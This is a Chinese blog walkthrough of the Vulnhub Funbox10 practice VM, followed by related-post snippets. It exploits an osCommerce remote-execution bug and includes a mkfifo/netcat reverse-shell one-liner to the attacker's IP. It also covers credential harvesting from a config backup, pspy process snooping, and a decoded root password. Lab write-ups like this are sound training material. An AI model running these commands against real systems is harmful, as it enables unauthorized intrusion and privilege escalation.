Funbox10靶机详解

最新推荐文章于 2024-06-14 20:00:00 发布
最新推荐文章于 2024-06-14 20:00:00 发布
阅读量277 收藏 1
点赞数 1
分类专栏: 打靶机系列 文章标签: linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44681307/article/details/131859078
版权

Funbox10靶机详解

最难的就是反弹shell,学会了一些新的反弹shell命令。

靶机下载地址:https://download.vulnhub.com/funbox/Funbox10.ova

我wget能下载文件的原因是我在kali上开启了apache2服务,常用文件放一起就好了。

service apache2 start

这个靶机扫描ip并没有什么有用的东西,就不展示了。

扫目录时候发现一个/catalog目录。

image-20230721190006321

进去后发现有点像一个CMS,就去搜索了一下有没有漏洞。

image-20230721190025898

没想到一搜全是漏洞。

searchsploit oscommerce

image-20230721190209174

下载了一个远程执行漏洞。

image-20230721190321923

看了一下源码说是有两个参数,并且参数必须严格这个格式,

image-20230721190350039

执行后发现拿到一个shell,但是这个shell权限很低,命令都不能用,就像做一个反弹shell

但是试了很多命令都不行。

就下面这个命令执行成功了。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.102.129 8888 >/tmp/f

image-20230721190530150

拿到shell以后执行:

pyhton3 -c "import pty;pty.spawn('/bin/bash')"

image-20230721190521207

ls查看一下,在当前目录下,找到了configure.php.bak文件,里面有一个jack用户的账号密码,su一下就登陆上了。

image-20230721191340594

但进去这个用户后其实也没啥东西,很难找到东西。

我们可以利用pspy64查看执行的进程,需要自己下载。

wget 192.168.102.129/pspy64

image-20230721191625059

加一个执行权限,然后执行。

image-20230721191714746

发现每隔一段时间就会执行一个文件。

image-20230721191746790

我们进去这个目录看看,cat一下发现点线索,一看这就是一个base64编码的。

/usr/share/doc/examples/

image-20230721192135616

解码一下发现是root的密码。

-u root -p rfvbgt!!

image-20230721192207528

成功拿到root权限。

image-20230721192247280

dumplings。
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机Funbox10
timesleep的博客
04-07 475
vulnhub靶机Funbox10 首先我们使用kali扫描地址 然后我们对靶机地址进行端口扫描 然后我们访问80端口看下 然后我们使用dirb扫描网站目录、然后我们访问这四个目录看下 只有catalog可以访问,那我们重点就看下这里,根据版本,我们找找到了他有命令执行,参考链接https://bbs.ichunqiu.com/thread-37191-1-1.html 确认并可以访问打开hackbar 执行payload,访问页面 GET:http://127.0.0.1/catal
Vulnhub靶机FunBox10
qq_48904485的博客
01-26 473
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FunBox1010.0.2.35)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/funbox/Funbox10.ova/
靶机实战:Funbox10
最新发布
CHAsichuan的博客
06-14 2210
一次中等难度的靶机超详细版记录
funbox10靶机(命令执行漏洞)
m0_66299232的博客
11-21 618
7.这次把命令换为一个可以反弹shell的命令,观察这是php网页,所以执行命令也是用php支持执行的(谷歌php执行命令函数),我们用shell-exec , bash -c 是执行的意思。5.把base_url改为靶机地址,进行访问,网页给出的是一个ls 命令的结果(29行)1.没有可利用的信息和文件,我选择上传本地脚本进行探测(github里有pspy64)2.对扫出的catalog目录进行访问,并且发现其版本号。5.尝试登录root用户,成功登录,顺利拿下!虚拟机网络链接模式:桥接模式。
FUNBOX-5靶机
小小猪的博客
06-30 356
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2354
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
ifunbox setup v4.4 资源管理神器
04-11
《ifunbox setup v4.4:iOS设备资源管理利器详解》 在移动设备的世界里,尤其是对于苹果的iPhone和iOS设备用户来说,管理和编辑设备上的文件并不像在电脑上那样直观简便。这时,一款强大的资源管理工具就显得尤为...
iFunBox ifunbox-v2.6.2375
10-21
iFunBox是一款针对苹果设备(包括iPhone、iPod Touch和iPad)的专业文件管理工具,它允许用户在无需越狱或安装额外守护进程的情况下,轻松访问和管理设备中的文件系统。这款软件提供了简单易用的界面,使得用户可以...
ifunbox_setup_4.2.exe
02-22
ifunbox_setup_4.2.exe
iFunBox下载 iFunbox v4.0 Build 4106.1352 Preview
10-16
iFunBox是一款小巧的iPhone文件管理软件。iFunBox中文版界面类似于windows资源管理器,以简练时尚的窗口方式浏览和管理iPhone、iPad、iPod touch上的文件和目录。iFunBox既可以在手机与电脑之间
iFunBox for iOS
06-02
iFunBox是一个iOS系统的文件浏览器,安装在Mac端,浏览iOS系统全面貌,就像Finder一样,iOS需要越狱,官方下载地址http://www.i-funbox.com/en_download.html
Funbox 3靶机wp
m0_52496313的博客
09-09 514
Funbox 3靶机wp
FUNBOX_SCRIPTKIDDIE靶机详解
weixin_44681307的博客
07-25 316
这个靶场给了太多的干扰因素,当你打完后反过来再看是非常简单的一个靶场,但是你打的过程中却会觉得非常难,干扰因素实在天多了。对IP进行一个单独扫描后发现开了一个ProFTPD 1.3.3c的FTP,直接对这个搜索了一下。里面给出就两天命令就可以拿到root权限了,输入后直接root,很简单。题目中给了说加一条hosts,实际没用上。发现有两个可以利用的,我选择的是第二个。
记一次Funbox10靶机的渗透测试
qq_55415442的博客
06-14 180
Funbox10靶机渗透测试
靶机Funbox: Scriptkiddie
weixin_50339323的博客
09-14 424
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
Vulnhub靶机FunBox 5
qq_48904485的博客
01-24 1045
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FunBox 5(10.0.2.30)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-next-level,547/
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1197
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 507
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
ifunbox教程:iPhone 4数据管理必备工具
"《用ifunbox给iPhone 4进行音乐、图片、程序、电子书导出、导入或删除的手册》是一份针对iOS设备尤其是iPhone 4用户的实用指南。这份文档详细介绍了如何利用ifunbox这款无需越狱也能使用的工具,轻松管理设备中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值